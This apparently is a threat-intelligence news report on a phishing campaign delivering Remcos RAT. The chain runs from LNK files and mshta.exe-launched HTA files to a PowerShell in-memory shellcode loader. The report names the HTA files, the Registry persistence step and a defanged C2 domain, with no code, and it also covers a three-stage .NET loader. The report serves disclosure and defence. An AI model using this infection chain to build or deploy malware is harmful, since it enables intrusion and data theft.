Cybersecurity researchers have identified a sophisticated malware campaign utilizing PowerShell-based shellcode loaders to deploy the Remcos Remote Access Trojan (RAT). This campaign employs deceptive tactics, including the use of malicious LNK files embedded within ZIP archives disguised as legitimate Office documents.
The attack sequence begins with the distribution of ZIP archives containing Windows shortcut (LNK) files. These LNK files, when executed, leverage `mshta.exe`—a legitimate Microsoft utility designed to run HTML Applications (HTA)—to initiate the infection process. Specifically, the LNK files execute an obfuscated HTA file named xlab22.hta hosted on a remote server. This HTA file contains Visual Basic Script code that downloads a PowerShell script, a decoy PDF document, and another HTA file named 311.hta. To ensure persistence, the HTA file modifies the Windows Registry, configuring 311.hta to launch automatically upon system startup.
Upon execution, the PowerShell script decodes and reconstructs a shellcode loader, which subsequently loads the Remcos RAT payload directly into the system’s memory. This fileless execution method allows the malware to operate without leaving traces on the disk, thereby evading traditional security measures.
Remcos RAT is a versatile tool that grants attackers full control over compromised systems. Its capabilities include gathering system metadata, logging keystrokes, capturing screenshots, monitoring clipboard data, and retrieving lists of installed programs and running processes. Additionally, it establishes a secure TLS connection to a command-and-control (C2) server at readysteaurants[.]com, facilitating continuous data exfiltration and remote control.
This method of deploying Remcos RAT is not unprecedented. In November 2024, Fortinet’s FortiGuard Labs detailed a similar phishing campaign that delivered the malware filelessly using order-themed lures. The appeal of such attack vectors lies in their ability to bypass traditional security solutions by executing malicious code directly in memory, leaving minimal forensic evidence.
The emergence of PowerShell-based attacks underscores the evolving tactics of threat actors aiming to circumvent conventional security defenses. By utilizing LNK files and `mshta.exe` to execute obfuscated PowerShell scripts, these campaigns can effectively evade detection. To mitigate such threats, it is crucial to implement advanced email security measures capable of detecting and blocking malicious LNK attachments before they reach end-users. Additionally, real-time monitoring of PowerShell commands for suspicious activities is essential in identifying and preventing potential breaches.
This disclosure coincides with findings from Palo Alto Networks’ Unit 42 and Threatray, which have detailed a new .NET loader used to deploy various information stealers and RATs, including Agent Tesla, NovaStealer, Remcos RAT, VIPKeylogger, XLoader, and XWorm. This loader operates through a three-stage process:
1. A .NET executable embedding the second and third stages in encrypted form.
2. A .NET DLL that decrypts and loads the subsequent stage.
3. A .NET DLL responsible for deploying the primary malware payload.
Notably, while earlier versions of this loader embedded the second stage as a hardcoded string, more recent iterations utilize a bitmap resource. The first stage extracts and decrypts this data, executing it in memory to maintain a fileless infection chain.
The continuous evolution of such sophisticated attack methodologies highlights the necessity for organizations to adopt comprehensive cybersecurity strategies. This includes regular software updates, employee training on recognizing phishing attempts, and the deployment of advanced threat detection systems capable of identifying and mitigating fileless malware attacks.
